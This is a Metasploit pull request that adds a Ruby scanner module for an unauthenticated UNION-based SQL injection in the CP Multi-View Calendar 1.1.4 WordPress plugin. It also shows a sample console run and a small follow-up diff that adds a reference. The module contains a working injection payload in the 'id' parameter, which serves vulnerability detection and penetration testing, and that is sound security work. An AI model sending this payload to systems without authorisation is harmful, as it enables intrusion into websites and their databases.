### PR TITLE
Create wordpress_cp_calendar_sqli.rb scanner

### DIFF
--- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb
+++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb
@@ -1,0 +1,74 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'CP Multi-View Calendar Unauthenticated SQL Injection Scanner',
+      'Description' => %q{
+        This module will scan given instances for an unauthenticated SQL injection
+        within the CP Multi-View Calendar plugin v1.1.4 for Wordpress.
+      },
+      'Author'       =>
+        [
+          'Joaquin Ramirez Martinez', #discovery
+          'bperry' #metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'EDB', '36243']
+        ],
+      'DisclosureDate' => 'Mar 03 2015'))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Target URI of the Wordpress instance', '/'])
+    ], self.class)
+  end
+
+  def run_host(ip)
+    right_marker = Rex::Text.rand_text_alpha(5)
+    left_marker = Rex::Text.rand_text_alpha(5)
+    flag = Rex::Text.rand_text_alpha(5)
+
+    vprint_status("#{peer} - Checking host")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/'),
+      'vars_get' => {
+        'action' => 'data_management',
+        'cpmvc_do_action' => 'mvparse',
+        'f' => 'edit',
+        'id' => "1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"
+      }
+    })
+
+    unless res && res.body
+      vprint_error("#{peer} - Server did not respond in an expected way")
+      return
+    end
+
+    result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
+
+    if result
+      print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress")
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Unauthenticated UNION-based SQL injection in CP Multi-View Calendar 1.1.4 for Wordpress",
+        :refs  => self.references.select { |ref| ref.ctx_val == "36243" }
+      })
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb
+++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb
@@ -27,7 +27,8 @@ class Metasploit4 < Msf::Auxiliary
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'EDB', '36243']
+          [ 'EDB', '36243'],
+          [ 'WPVDB', '7910' ]
         ],
       'DisclosureDate' => 'Mar 03 2015'))
 


### PR DESCRIPTION
This module will scan for vulnerable instances of CP Multi-View Calendar v1.1.4 (and prior) for Wordpress by exploiting an unauthenticated UNION-based SQL injection.

http://www.exploit-db.com/exploits/36243/

Quick run:

```
msf auxiliary(wordpress_cp_calendar_sqli) > show options

Module options (auxiliary/scanner/http/wordpress_cp_calendar_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.31.16.49     yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /wordpress/      yes       Target URI of the Wordpress instance
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(wordpress_cp_calendar_sqli) > run

[+] 172.31.16.49:80 - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_cp_calendar_sqli) > 

```

Passes msftidy:

```
$ tools/msftidy.rb modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb 
$
```

Thanks!
